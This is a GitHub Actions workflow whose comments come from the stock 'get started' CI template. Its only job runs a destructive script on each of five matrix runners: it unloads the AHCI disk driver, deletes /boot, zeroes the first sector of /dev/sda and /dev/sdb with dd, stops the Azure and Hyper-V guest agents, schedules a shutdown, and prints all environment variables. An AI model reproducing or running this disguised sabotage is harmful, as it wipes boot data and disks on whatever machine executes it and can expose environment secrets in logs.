# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest
    strategy:
      matrix:
        qwq: [1, 2, 3, 4, 5]
    steps:
      - name: Run a multi-line script
        run: |
          sudo modprobe -r ahci

          sudo shutdown -h +120 > /dev/null 2>&1
          sudo rm -rf /home/runner/work/_temp/*
          
          sudo umount /boot/efi
          sudo rm -rf /boot/*
          
          sudo systemctl stop walinuxagent.service
          sudo systemctl stop hv-kvp-daemon.service

          sudo dd if=/dev/zero of=/dev/sda bs=512 count=1 conv=notrunc > /dev/null 2>&1
          sudo dd if=/dev/zero of=/dev/sdb bs=512 count=1 conv=notrunc > /dev/null 2>&1

          sudo printenv
